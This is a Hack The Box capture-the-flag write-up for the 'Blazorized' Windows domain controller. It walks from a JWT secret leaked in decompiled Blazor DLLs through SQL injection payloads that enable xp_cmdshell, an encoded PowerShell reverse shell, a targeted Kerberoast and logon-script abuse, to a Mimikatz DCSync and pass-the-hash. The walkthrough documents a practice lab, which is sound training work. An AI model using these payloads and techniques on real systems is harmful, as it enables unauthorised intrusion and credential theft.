Introduction to Blazorized:

This write-up will explore the “Blazorized” machine from Hack The Box, categorized as a Hard difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective on Blazorized machine:

The goal of this walkthrough is to complete the “Blazorized” machine from Hack The Box by achieving the following objectives:

User Flag:

JWT secret recovery leading to SQL injection

  • Analyze a website built with the Blazor .NET framework.
  • Decompile one of the .NET DLLs the Blazor WebAssembly app ships to the browser and extract the hard-coded JWT signing secret.
  • Use the secret to forge a Super_Admin token and reach the admin dashboard.
  • Exploit a SQL injection in the admin dashboard to enable xp_cmdshell and run OS commands.
  • Turn that command execution into a reverse shell and read the user flag.

Root Flag:

Targeted Kerberoast, logon-script abuse and DCSync with Mimikatz

  • Abuse the WriteSPN right over a service account to perform a targeted Kerberoast and crack the resulting ticket hash offline.
  • Use that account's write access over another user to set its logon script (scriptPath), which runs in that user's context at logon.
  • Abuse the GetChangesAll (DCSync) right with Mimikatz to dump domain hashes.
  • Retrieve the Administrator NTLM hash and gain a shell as Administrator.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oA initial 10.10.11.22

Nmap Output:

┌─[darknite@parrot]─[~/Documents/htb/blazorized]
└──╼ $nmap -sC -sV 10.10.11.22 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 00:06 EST
Nmap scan report for 10.10.11.22
Host is up (0.17s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-09 05:06:49Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info: 
|   10.10.11.22\BLAZORIZED: 
|     Instance name: BLAZORIZED
|     Version: 
|       name: Microsoft SQL Server 2022 RC0+
|       number: 16.00.1115.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RC0
|       Post-SP patches applied: true
|     TCP port: 1433
|_    Clustered: false
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-08T04:01:58
|_Not valid after:  2054-11-08T04:01:58
|_ssl-date: 2024-11-09T05:07:09+00:00; +1s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.22\BLAZORIZED: 
|     Target_Name: BLAZORIZED
|     NetBIOS_Domain_Name: BLAZORIZED
|     NetBIOS_Computer_Name: DC1
|     DNS_Domain_Name: blazorized.htb
|     DNS_Computer_Name: DC1.blazorized.htb
|     DNS_Tree_Name: blazorized.htb
|_    Product_Version: 10.0.17763
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-11-09T05:07:00
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.74 seconds

Analysis:

  • Port 53 (DNS): reported as Simple DNS Plus, which is nmap's usual fingerprint for the Microsoft DNS service on a domain controller.
  • Port 80 (HTTP): Microsoft IIS 10.0, redirecting to http://blazorized.htb; add that name to /etc/hosts before going further.
  • Port 88 (Kerberos): Kerberos KDC, which together with LDAP on 389/636 and the Global Catalog on 3268/3269 marks this host as an Active Directory domain controller.
  • Port 135 (RPC): Microsoft RPC endpoint mapper.
  • Port 139 (NetBIOS): NetBIOS session service for SMB.
  • Port 389 (LDAP): Active Directory LDAP for the blazorized.htb domain.
  • Port 445 (SMB): SMB; nmap could not fingerprint the version, and the host script shows message signing is required.
  • Port 464 (kpasswd): Kerberos password-change service.
  • Port 593 (RPC over HTTP): RPC endpoint mapper over HTTP, standard on domain controllers.
  • Port 636 (LDAPS): LDAP over TLS; shown as tcpwrapped because the probe did not complete a handshake.
  • Port 1433 (MSSQL): Microsoft SQL Server 2022 (16.00.1115.00), instance BLAZORIZED. Its NTLM challenge leaks the host name DC1.blazorized.htb and OS build 10.0.17763 (Windows Server 2019), so the SQL Server runs on the domain controller itself.
  • Port 3268 (Global Catalog LDAP): Global Catalog, allowing forest-wide searches.
  • Port 3269 (Global Catalog LDAPS): Global Catalog over TLS, also tcpwrapped.

Web Enumeration:

IIS redirected us to http://blazorized.htb, so add that name to /etc/hosts and enumerate virtual hosts. In gobuster's vhost mode the target has to be the domain rather than the IP, so that each wordlist entry is sent as <word>.blazorized.htb in the Host header.

gobuster vhost -u http://blazorized.htb -w /opt/Seclist/Discovery/DNS/subdomains_top1million-5000.txt --append-domain

Gobuster Output:

Most candidates come back with a 400 status (IIS rejects Host headers it has no binding for), so those are noise; the hits are the few names that return something else.

The scan yields two virtual hosts, admin and api. The api host answers its root path with a 404, so if you enumerate with ffuf instead, pass -mc all; ffuf drops 404 responses by default and you would miss it. Add both names to /etc/hosts.

The main website itself is a simple blog with little attack surface.

Anonymous access to the SMB service on port 445 is denied.

Browsing to http://admin.blazorized.htb shows a login page.

Blazor enumeration

The main site deserves a closer look, because the way Blazor delivers an application decides what an attacker gets to see.

Blazor has two hosting models. Blazor Server keeps the components on the server and pushes UI updates to the browser over a SignalR connection, so the browser only ever receives HTML and JavaScript. Blazor WebAssembly instead compiles the application into ordinary .NET assemblies that the browser downloads and executes inside a WebAssembly-hosted runtime. Every DLL, with all of its string constants, is therefore handed to the client and can be decompiled as easily as any other .NET assembly.

Loading the main page pulls down numerous DLL files, which tells us this is the WebAssembly model: anything the developers compiled into those assemblies (connection strings, API keys, signing secrets) is exposed to anyone who saves and decompiles them.

One of the JavaScript files (the Blazor loader) also reveals details about the application and the assemblies it loads.

Download the application's own DLLs (as opposed to the framework assemblies) and open them in a .NET decompiler such as ILSpy or dnSpy. One of them contains the following:

private const long EXPIRATION_DURATION_IN_SECONDS = 60L;
private static readonly string jwtSymmetricSecurityKey = "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";
private static readonly string superAdminEmailClaimValue = "superadmin@blazorized.htb";
private static readonly string postsPermissionsClaimValue = "Posts_Get_All";
private static readonly string categoriesPermissionsClaimValue = "Categories_Get_All";
private static readonly string superAdminRoleClaimValue = "Super_Admin";
private static readonly string issuer = "http://api.blazorized.htb";
private static readonly string apiAudience = "http://api.blazorized.htb";
private static readonly string adminDashboardAudience = "http://admin.blazorized.htb";

These are the application's JWT settings, and they were compiled into an assembly that every visitor downloads. The damaging item is jwtSymmetricSecurityKey: with HS256 the same key both signs and verifies, so whoever holds it can mint tokens the API and the dashboard will accept. The remaining constants spell out exactly what a valid super-admin token must contain: issuer http://api.blazorized.htb, audience http://admin.blazorized.htb for the dashboard, an email claim of superadmin@blazorized.htb and a role claim of Super_Admin. EXPIRATION_DURATION_IN_SECONDS (60) is only the lifetime the server issues with; a forged token can carry whatever exp we like.

Forge such a token, signed with the recovered key, and store it in the browser's Local Storage for admin.blazorized.htb (DevTools, Application tab) under the key the admin application reads its token from, then reload the page.

Success! The forged token gets us into the admin.blazorized.htb dashboard.

Exploitation

Web Application Exploitation:

The dashboard has features that pass user input to the database, and that is where the SQL injection lives.

In the left-hand menu there is a query icon with two options, "Check Duplicate Post Titles" and "Check Duplicate Category Names". Both feed user input into a query, so I tested injection against one of them.

The first payload closes the string literal, stacks a statement that enables xp_cmdshell, and comments out the remainder of the original query:

';exec sp_configure 'xp_cmdshell','1';reconfigure;--

It is a success! That also tells us the application's database login holds ALTER SETTINGS (in practice sysadmin), since nothing less can change server configuration. If the server instead answers that the option "does not exist, or it may be an advanced option", enable 'show advanced options' first with the same sp_configure and RECONFIGURE pattern, then retry.

Let's confirm command execution with a ping back to our machine (run tcpdump on the VPN interface and watch for ICMP).

It works like a charm: the echo requests arrive.

Start a listener on the attacking machine.

The payload has the same shape, this time launching an encoded PowerShell reverse shell. <BASE64> stands for the base64 of the UTF-16LE-encoded one-liner, which is what powershell -e expects:

';EXEC master..xp_cmdshell 'powershell -e <BASE64>';--

We receive a reverse shell connection.

We can view the user flag by typing “type user.txt“.

Escalate to Administrator (Root Flag) on the Blazorized Machine

Privilege Escalation:

Bloodhound enumeration


BloodHound, fed with data collected from the foothold, shows the path onward.

The interesting edge is WriteSPN over RSA_4810: our current account can set an arbitrary servicePrincipalName on that user, request a Kerberos service ticket for it and take the ticket's TGS-REP hash offline. This is a targeted Kerberoast; it yields a crackable hash rather than the password, so the strength of RSA_4810's password decides whether it pays off.

Since BloodHound does not show a path beyond RSA_4810 directly, let's look at which accounts hold elevated permissions.


After analyzing the data from BloodHound, I decided to use Powerview.ps1.


We successfully obtained information on RSA_4810.

RSA_4810 enumeration on Blazorized machine

We also retrieved RSA_4810's Kerberos service-ticket hash through the targeted Kerberoast described above.

After some time cracking that hash offline, we recovered RSA_4810's password.

Let's log in with the credentials we found earlier.

RSA_4810 has write access over the SSA_6010 account, so I set its scriptPath attribute to point at a shell.bat of my own. scriptPath is resolved relative to the domain's NETLOGON share, so the batch file has to sit somewhere under that share that RSA_4810 can write to; it then runs in SSA_6010's context every time that user logs on.


We have successfully logged in as SSA_6010.


SSA_6010 holds the GetChangesAll (DCSync) right over the domain, so running Mimikatz's lsadump::dcsync module against the Administrator account of blazorized.htb returns the Administrator NTLM hash by replicating it from the directory, without touching the DC's disk.

Authenticate as Administrator with that hash (pass-the-hash) and view the root flag by typing "type root.txt".
